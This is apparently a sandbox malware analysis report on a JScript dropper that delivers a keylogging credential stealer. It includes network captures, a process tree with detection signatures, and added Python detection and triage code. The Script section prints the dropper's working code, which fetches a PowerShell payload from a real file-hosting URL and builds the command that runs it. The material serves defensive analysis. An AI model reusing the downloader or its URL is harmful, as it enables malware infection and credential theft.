                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 36 62 56 76 6d 45 36 62 6a 39 59 32 6f 67 57 6e 49 56 74 4a 53 7a 6c 4d 2f 33 61 53 52 6a 62 6f 32 68 53 61 31 35 2b 71 2b 32 49 43 42 47 4d 42 70 64 75 67 4a 65 4d 36 6c 41 6f 67 33 31 67 2f 31 61 59 5a 48 62 33 5a 32 34 50 67 76 50 6c 78 6b 71 38 59 56 55 38 62 34 58 68 32 76 37 47 34 39 78 66 66 52 76 4e 48 50 42 35 66 76 75 47 58 4e 4e 62 35 55 73 52 6a 58 64 2b 57 47 44 61 44 76 69 72 62 6c 33 35 77 50 59 34 77 75 62 36 46 68 35 4a 54 6d 71 31 68 64 47 45 43 4b 68 76 32 43 36 66 32 6f 42 63 50 58 4e 66 30 73 63 67 54 2b 38 4c 69 32 53 61 38 38 47 49 6b 77 44 34 30 48 68 34 35 55 46 4b 43 46 55 30 48 77 6e 77 38 36 51 51 71 70 79 7a 56 65 5a 35 6a 54 69 50 76 51 4a 53 64 4c 74 39 62 52 46 66 48 58 5a 69 53 6c 6f 38 6a 36 74 47 39 2b 38 6c 42 76 67 76
                                                                                                      Data Ascii: 6bVvmE6bj9Y2ogWnIVtJSzlM/3aSRjbo2hSa15+q+2ICBGMBpdugJeM6lAog31g/1aYZHb3Z24PgvPlxkq8YVU8b4Xh2v7G49xffRvNHPB5fvuGXNNb5UsRjXd+WGDaDvirbl35wPY4wub6Fh5JTmq1hdGECKhv2C6f2oBcPXNf0scgT+8Li2Sa88GIkwD40Hh45UFKCFU0Hwnw86QQqpyzVeZ5jTiPvQJSdLt9bRFfHXZiSlo8j6tG9+8lBvgv
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 5a 54 34 52 2b 63 31 6b 65 66 4a 7a 47 52 75 38 59 38 7a 61 4d 50 5a 50 42 34 6a 77 48 78 50 31 74 46 7a 59 6f 2b 47 34 75 53 65 7a 65 45 4d 55 65 41 52 64 31 6f 78 67 6a 66 36 4d 54 57 47 32 45 6c 46 59 52 65 32 67 44 63 33 72 6f 79 59 37 49 70 52 71 55 44 72 74 72 58 52 46 31 68 64 48 45 57 56 35 4b 6a 43 4d 57 78 73 62 43 51 4d 30 48 68 6a 4c 4e 54 6a 53 33 35 41 6f 65 44 68 38 42 6e 33 33 48 50 72 59 7a 70 35 62 4e 39 67 44 41 6d 72 77 55 78 4f 6f 72 57 65 58 77 35 6e 4b 79 44 73 65 5a 31 52 33 2f 74 45 54 6b 4d 4d 44 47 34 41 42 7a 55 6e 32 43 46 71 72 59 33 45 49 73 52 57 71 38 43 31 67 77 6e 50 43 32 31 2f 54 4f 44 79 77 51 47 49 6c 67 6a 50 38 61 45 62 37 63 79 50 77 44 75 70 66 53 33 6b 6d 70 39 36 50 76 77 4e 71 47 61 4b 2b 52 77 74 77 71 4b 66
                                                                                                      Data Ascii: ZT4R+c1kefJzGRu8Y8zaMPZPB4jwHxP1tFzYo+G4uSezeEMUeARd1oxgjf6MTWG2ElFYRe2gDc3royY7IpRqUDrtrXRF1hdHEWV5KjCMWxsbCQM0HhjLNTjS35AoeDh8Bn33HPrYzp5bN9gDAmrwUxOorWeXw5nKyDseZ1R3/tETkMMDG4ABzUn2CFqrY3EIsRWq8C1gwnPC21/TODywQGIlgjP8aEb7cyPwDupfS3kmp96PvwNqGaK+RwtwqKf
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 41 53 2f 65 79 64 77 2f 53 6e 71 71 66 66 54 39 4e 51 33 52 78 44 6c 76 39 6e 51 72 5a 41 30 6d 77 6f 7a 73 74 75 7a 41 31 65 65 65 52 6a 75 70 68 31 59 72 6f 63 50 30 61 34 75 45 53 45 46 4c 55 34 77 45 48 53 64 5a 7a 44 33 63 51 32 6e 4b 37 69 6a 72 42 33 2f 68 65 62 74 41 2f 63 6a 2b 37 44 59 54 6f 4a 67 56 4a 71 35 62 55 6e 47 51 41 49 5a 66 37 69 6d 47 4f 54 4f 49 4a 62 53 75 30 56 72 36 4f 63 6e 48 59 68 32 55 7a 74 6a 37 30 30 76 69 6a 7a 51 47 4c 48 52 32 42 4a 48 75 76 44 56 42 67 73 4d 41 65 74 37 74 65 30 44 4b 50 78 34 75 42 2f 63 79 75 35 51 66 70 62 46 2b 48 75 4e 74 46 63 55 56 79 61 32 5a 65 4f 6b 36 33 78 51 6d 74 6f 50 7a 71 48 6b 48 54 36 72 42 64 53 51 44 4f 76 72 6b 47 77 69 54 6e 59 46 41 6d 4d 55 32 2f 4e 37 59 4d 58 61 37 33 4a 37
                                                                                                      Data Ascii: AS/eydw/SnqqffT9NQ3RxDlv9nQrZA0mwozstuzA1eeeRjuph1YrocP0a4uESEFLU4wEHSdZzD3cQ2nK7ijrB3/hebtA/cj+7DYToJgVJq5bUnGQAIZf7imGOTOIJbSu0Vr6OcnHYh2Uztj700vijzQGLHR2BJHuvDVBgsMAet7te0DKPx4uB/cyu5QfpbF+HuNtFcUVya2ZeOk63xQmtoPzqHkHT6rBdSQDOvrkGwiTnYFAmMU2/N7YMXa73J7
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 36 6f 59 65 34 4e 5a 4f 74 68 2f 51 4c 6d 2b 42 7a 37 2f 4e 63 6b 54 41 46 47 6a 44 34 77 50 7a 41 6c 4a 61 33 6b 6c 77 46 6c 4f 4b 6c 43 48 77 52 74 4d 77 6d 38 52 63 59 48 63 62 78 6f 58 47 65 44 77 74 48 39 38 36 7a 4a 7a 2b 66 59 6d 73 4e 75 39 7a 2b 78 2b 46 6b 73 4a 6f 62 53 6b 68 59 72 6f 37 59 62 49 37 67 52 46 31 61 2b 71 2f 6c 6d 36 33 70 4a 5a 38 4c 6f 31 59 43 38 6f 6c 76 52 31 31 6f 33 33 38 35 61 52 4d 75 6b 62 6f 72 4d 4a 70 71 41 67 50 30 35 46 68 78 73 4c 66 73 2f 6c 74 69 36 6c 72 4a 39 79 43 41 56 65 7a 33 62 6f 74 41 76 55 6c 54 79 47 57 56 6e 73 54 5a 38 65 65 6b 55 2f 4c 6d 34 59 6f 55 4f 42 75 36 6f 66 65 70 79 37 76 32 35 55 41 65 41 6e 6e 58 51 58 36 79 70 6d 38 50 58 6d 61 4b 59 67 79 35 45 4a 30 4d 77 61 46 45 63 2b 35 74 74 75
                                                                                                      Data Ascii: 6oYe4NZOth/QLm+Bz7/NckTAFGjD4wPzAlJa3klwFlOKlCHwRtMwm8RcYHcbxoXGeDwtH986zJz+fYmsNu9z+x+FksJobSkhYro7YbI7gRF1a+q/lm63pJZ8Lo1YC8olvR11o3385aRMukborMJpqAgP05FhxsLfs/lti6lrJ9yCAVez3botAvUlTyGWVnsTZ8eekU/Lm4YoUOBu6ofepy7v25UAeAnnXQX6ypm8PXmaKYgy5EJ0MwaFEc+5ttu
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 41 41 41 51 42 34 42 77 41 41 41 67 44 35 42 41 41 41 41 51 42 52 42 51 41 41 41 51 42 34 42 67 41 41 41 67 41 51 41 51 41 41 41 51 41 78 41 51 41 41 41 67 43 35 42 67 41 41 41 51 43 31 41 41 41 41 41 51 41 78 41 51 41 41 41 51 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 67 41 41 41 41 41 41 41 77 41 41 41
                                                                                                      Data Ascii: AAAQB4BwAAAgD5BAAAAQBRBQAAAQB4BgAAAgAQAQAAAQAxAQAAAgC5BgAAAQC1AAAAAQAxAQAAAQAAAAAAAQAAAAAAAgAAAAAAAwAAAAAAAQAAAAAAAgAAAAAAAwAAAAAAAQAAAAAAAgAAAAAAAQAAAAAAAQAAAAAAAgAAAAAAAwAAAAAAAQAAAAAAAgAAAAAAAwAAAAAABAAAAAAAAQAAAAAAAgAAAAAAAwAAAAAAAQAAAAAAAgAAAAAAAwAAA


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 104.21.96.1 | 443 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-09 17:33:20 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-09 17:33:20 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 17:33:20 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1758789
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVmTfNWZDrKwgeUbWR8T13Yv%2Bm4Fz5n%2BMTWAjT9dQQCwHa9ir6x07JwINa3TfCNKOGPOJLK3T%2BH9rRlUdHp07wd0yiZaBogVAfI2uK4PSVQd91iZ4kgZCovp7SXA%2BO8VKqhm3OgA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ff62bfc28d8c32e-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=11500&min_rtt=1998&rtt_var=6567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1461461&cwnd=178&unsent_bytes=0&cid=4797d18aaa7e3ab8&ts=400&x=0"
2025-01-09 17:33:20 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 9, 2025 18:33:28.874438047 CET | 587 | 49736 | 123.30.244.30 | 192.168.2.4 | 220-500254.static.maychudns.com ESMTP MSA Fri, 10 Jan 2025 00:33:28 +0700
220 ESMTP This server does not relay
Jan 9, 2025 18:33:28.874634981 CET | 49736 | 587 | 192.168.2.4 | 123.30.244.30 | EHLO 088753
Jan 9, 2025 18:33:29.441633940 CET | 587 | 49736 | 123.30.244.30 | 192.168.2.4 | 250-500254.static.maychudns.com Hello 088753 [8.46.123.189], pleased to meet you
250-AUTH LOGIN CRAM-MD5 PLAIN
250-8BITMIME
250-ENHANCEDSTATUSCODES
250-STARTTLS
250 SIZE 35840000
Jan 9, 2025 18:33:29.441786051 CET | 49736 | 587 | 192.168.2.4 | 123.30.244.30 | STARTTLS
Jan 9, 2025 18:33:29.789529085 CET | 587 | 49736 | 123.30.244.30 | 192.168.2.4 | 220 2.7.0 Ready to start TLS


                                                                                                      Target ID:0
                                                                                                      Start time:12:33:08
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse"
                                                                                                      Imagebase:0x7ff692330000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:12:33:11
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                                                                      Imagebase:0x7ff788560000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:12:33:11
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:12:33:17
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                      Imagebase:0x810000
                                                                                                      File size:139'776 bytes
                                                                                                      MD5 hash:9FB7455B1C6CB563FF7E58F422F3BC6E
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Avira
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:12:33:17
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      Imagebase:0x280000
                                                                                                      File size:65'440 bytes
                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:12:33:17
                                                                                                      Start date:09/01/2025
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                      Imagebase:0x960000
                                                                                                      File size:65'440 bytes
                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2956937742.0000000002DE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:false
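Taken together, the process list and the two network sessions above give the chain a detection engineer would key on: wscript.exe starting powershell.exe with a -File argument under C:\Temp, a fresh executable in AppData\Local\Temp, RegAsm.exe launched with an empty command line (a .NET framework utility that has no reason to touch the network) and then contacting a geo-IP service on 443 and a mail server on the SMTP submission port 587. The Python below is an added example, not part of the Joe Sandbox report: it encodes those rules over constructed process-creation and network-connection events shaped loosely like Sysmon events 1 and 3, and walks parent links to rebuild the chain. PID 7704, the RegAsm.exe destination 104.21.96.1:443 and the mail server 123.30.244.30:587 are read from the session tables; the other PIDs and the parent links (powershell.exe -> x.exe -> RegAsm.exe) are assumptions chosen to match the start times and the injection signatures, because this section of the report does not print parent PIDs.

```python
"""Added example: behavioural rules for the execution chain and network activity in this report."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# .NET framework utilities that loaders hollow into; none of them needs the network
DOTNET_LOLBINS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}
SMTP_PORTS = {25, 465, 587, 2525}


@dataclass
class ProcEvent:            # roughly Sysmon event ID 1
    pid: int
    image: str
    cmdline: str
    parent_pid: Optional[int] = None
    parent_image: Optional[str] = None


@dataclass
class NetEvent:             # roughly Sysmon event ID 3
    pid: int
    image: str
    dst_ip: str
    dst_port: int


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_user_writable(path: str) -> bool:
    p = path.lower()
    return ("\\appdata\\local\\temp\\" in p or p.startswith("c:\\temp\\")
            or "\\users\\public\\" in p or p.startswith("c:\\programdata\\"))


def is_local(ip: str) -> bool:
    a = ipaddress.ip_address(ip)
    return a.is_private or a.is_loopback or a.is_link_local


def detect_process(ev: ProcEvent) -> List[str]:
    hits = []
    img = basename(ev.image)
    parent = basename(ev.parent_image) if ev.parent_image else ""
    if parent in SCRIPT_HOSTS and img in SHELLS:
        hits.append("script_host_spawns_shell")
    m = re.search(r'-file\s+"?([^"\s]+)', ev.cmdline, re.I)
    if img in SHELLS and m and is_user_writable(m.group(1)):
        hits.append("shell_runs_script_from_user_writable_dir")
    if is_user_writable(ev.image):
        hits.append("image_in_user_writable_dir")
    if img in DOTNET_LOLBINS:
        # a bare RegAsm.exe command line does nothing useful; it is the classic hollowing target
        if ev.cmdline.strip().strip('"').lower().endswith(img):
            hits.append("dotnet_utility_launched_without_arguments")
        if ev.parent_image and is_user_writable(ev.parent_image):
            hits.append("dotnet_utility_spawned_from_user_writable_dir")
    return hits


def detect_network(ev: NetEvent) -> List[str]:
    hits = []
    img = basename(ev.image)
    if img in DOTNET_LOLBINS and not is_local(ev.dst_ip):
        hits.append("dotnet_utility_external_connection")
        if ev.dst_port in SMTP_PORTS:
            hits.append("dotnet_utility_smtp_connection")
    if img in SCRIPT_HOSTS and not is_local(ev.dst_ip):
        hits.append("script_host_external_connection")
    return hits


def ancestry(pid: int, procs: Dict[int, ProcEvent]) -> List[str]:
    """Image names from pid up to the root we know about; the seen-set guards against PID reuse loops."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(basename(procs[pid].image))
        pid = procs[pid].parent_pid
    return chain


def triage(proc_events: List[ProcEvent], net_events: List[NetEvent]) -> Tuple[dict, dict]:
    procs = {p.pid: p for p in proc_events}
    findings: Dict[int, List[str]] = {}
    for p in proc_events:
        for h in detect_process(p):
            findings.setdefault(p.pid, []).append(h)
    for n in net_events:
        for h in detect_network(n):
            findings.setdefault(n.pid, []).append(h)
    # an SMTP connection from a hollowed .NET utility is the high-confidence hit; attach its lineage
    chains = {pid: ancestry(pid, procs) for pid, hits in findings.items()
              if "dotnet_utility_smtp_connection" in hits}
    return findings, chains


# Constructed events mirroring the report. PIDs other than 7704 and all parent links are assumed.
PROC_EVENTS = [
    ProcEvent(100, r"C:\Windows\System32\wscript.exe",
              r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse"'),
    ProcEvent(200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"',
              100, r"C:\Windows\System32\wscript.exe"),
    ProcEvent(300, r"C:\Users\user\AppData\Local\Temp\x.exe", r'"C:\Users\user\AppData\Local\Temp\x.exe"',
              200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(7704, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
              300, r"C:\Users\user\AppData\Local\Temp\x.exe"),
]
NET_EVENTS = [
    NetEvent(7704, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "104.21.96.1", 443),
    NetEvent(7704, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "123.30.244.30", 587),
]

if __name__ == "__main__":
    findings, chains = triage(PROC_EVENTS, NET_EVENTS)
    for pid, hits in sorted(findings.items()):
        print(pid, hits)
    print(chains)
```

Run as a script it prints one line per flagged PID and the recovered chain regasm.exe -> x.exe -> powershell.exe -> wscript.exe. Each rule on its own is medium confidence (administrators do run PowerShell from C:\Temp); the ancestry walk is what turns them into the single "suspicious execution chain" the report flags, and the SMTP rule is the one to page on, because a hollowed RegAsm.exe speaking to port 587 is credential exfiltration in progress.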

Call Graph

(Rendered as an image in the report, with executed and not-executed functions coloured differently; the colouring is not recoverable from the page, the edges below are.)
entry -> CreateObject, CreateObject, CreateObject, _u
_i -> FolderExists, CreateFolder
_j -> Open, Send, CreateTextFile, Write, Close, _m
_m -> Echo
_q -> _m, Run
_u -> _i, _j, _m, _q, Quit
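The call graph is the sandbox's view of the dropper's control flow: _u drives the run, _i prepares C:\Temp, _j downloads and writes the payload through MSXML2.XMLHTTP and the FileSystemObject, and _q hands the result to WScript.Shell.Run. The Python below is an added example, not from the report or from the malware author: a static triage pass over the script body printed in the Script section that follows (JScript executed by wscript.exe). It pulls the string constants, the COM objects bound through WScript.CreateObject and the method calls made on them, resolves call arguments that are plain variable references back to the constants, and classifies IOCs and capabilities. The embedded source is the part of the script visible on this page and stops where the listing is cut, so the Run call in _q is not in it and _j's parameters _k and _l stay symbolic (the runtime trace in the listing shows them bound to _a and _b); the capability table and the IOC classifier are the example's own.

```python
"""Added example: static triage of the WSH/JScript dropper printed in the Script section."""
import re

# The dropper body as the report prints it, up to the point where the listing is cut.
JSE_SOURCE = r'''
var _a = "https://files.catbox.moe/jqxrkk.ps1";
var _b = "C:\\Temp\\dddddd.ps1";
var _c = "C:\\Temp";
var _d = 200;
var _e = "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ";
var _f = WScript.CreateObject ( "WScript.Shell" );
var _g = WScript.CreateObject ( "Scripting.FileSystemObject" );
var _h = WScript.CreateObject ( "MSXML2.XMLHTTP" );
function _i() {
    if ( ! _g.FolderExists ( _c ) )
    {
        _g.CreateFolder ( _c );
    }
}
function _j(_k, _l) {
    _h.Open ( "GET", _k, false );
    _h.Send ( );
    if ( _h.Status !== _d )
    {
        _m ( "Download failed with status: " + _h.Status );
        return false;
    }
    try
    {
        var _n = _g.CreateTextFile ( _l, true );
'''

# (progid, method) pairs worth flagging; this table is the example's own, not the sandbox's
CAPABILITIES = {
    ("MSXML2.XMLHTTP", "Open"): "network: HTTP request",
    ("MSXML2.XMLHTTP", "Send"): "network: HTTP request",
    ("Scripting.FileSystemObject", "CreateFolder"): "file: create directory",
    ("Scripting.FileSystemObject", "CreateTextFile"): "file: write dropped file",
    ("WScript.Shell", "Run"): "execution: launch command line",
    ("WScript.Shell", "Exec"): "execution: launch command line",
}


def js_string(literal: str) -> str:
    """Decode a double-quoted JScript literal; only the escapes this sample uses are handled."""
    return literal[1:-1].replace('\\\\', '\\').replace('\\"', '"')


def parse_constants(src: str) -> dict:
    """var NAME = "string"; and var NAME = 123; assignments, in source order."""
    consts = {}
    for name, value in re.findall(r'var\s+(\w+)\s*=\s*("(?:[^"\\]|\\.)*"|\d+)\s*;', src):
        consts[name] = js_string(value) if value.startswith('"') else int(value)
    return consts


def parse_com_objects(src: str) -> dict:
    """Variables bound to WScript.CreateObject("progid")."""
    return dict(re.findall(r'var\s+(\w+)\s*=\s*WScript\.CreateObject\s*\(\s*"([^"]+)"\s*\)', src))


def resolve_arg(arg: str, consts: dict):
    arg = arg.strip()
    if arg.startswith('"'):
        return js_string(arg)
    return consts.get(arg, arg)     # function parameters such as _k stay symbolic


def parse_calls(src: str, consts: dict, com: dict) -> list:
    """Method calls on COM objects with arguments resolved where they are constants.
    Argument lists are split on commas, which is enough for this sample (no nested calls)."""
    calls = []
    for obj, method, args in re.findall(r'(\w+)\s*\.\s*(\w+)\s*\(([^()]*)\)', src):
        if obj in com:
            argv = [resolve_arg(a, consts) for a in args.split(",")] if args.strip() else []
            calls.append((com[obj], method, argv))
    return calls


def extract_iocs(consts: dict) -> dict:
    iocs = {"urls": [], "paths": [], "commands": []}
    for v in consts.values():
        if not isinstance(v, str):
            continue
        if re.match(r"https?://", v, re.I):
            iocs["urls"].append(v)
        elif re.match(r"[a-z]:\\", v, re.I):
            iocs["paths"].append(v)
        elif re.match(r"\s*(powershell|cmd|wscript|cscript|mshta|rundll32)\b", v, re.I):
            iocs["commands"].append(v)
    return iocs


def triage(src: str) -> dict:
    consts = parse_constants(src)
    com = parse_com_objects(src)
    calls = parse_calls(src, consts, com)
    caps = sorted({CAPABILITIES[(p, m)] for p, m, _ in calls if (p, m) in CAPABILITIES})
    return {"constants": consts, "com_objects": com, "calls": calls,
            "iocs": extract_iocs(consts), "capabilities": caps}


if __name__ == "__main__":
    for key, value in triage(JSE_SOURCE).items():
        print(key, value)
```

Running it yields the download URL, the drop path and the PowerShell command prefix without executing anything, which is the point: the single-letter variable names hide nothing once constants and CreateObject bindings are resolved, and the same three progids (WScript.Shell, Scripting.FileSystemObject, MSXML2.XMLHTTP) appearing together in one .jse is a reasonable static triage signal on its own.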

Script:

Code (bulleted lines are the sandbox's runtime trace for the call on the preceding line)

var _a = "https://files.catbox.moe/jqxrkk.ps1";
var _b = "C:\\Temp\\dddddd.ps1";
var _c = "C:\\Temp";
var _d = 200;
var _e = "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ";
var _f = WScript.CreateObject ( "WScript.Shell" );
    • Windows Script Host.CreateObject("WScript.Shell") ➔
var _g = WScript.CreateObject ( "Scripting.FileSystemObject" );
    • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
var _h = WScript.CreateObject ( "MSXML2.XMLHTTP" );
    • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
function _i() {
    • _i() ➔ undefined
    if ( ! _g.FolderExists ( _c ) )
        • FolderExists("C:\Temp") ➔ false
    {
        _g.CreateFolder ( _c );
            • CreateFolder("C:\Temp") ➔ C:\Temp
    }
}
function _j(_k, _l) {
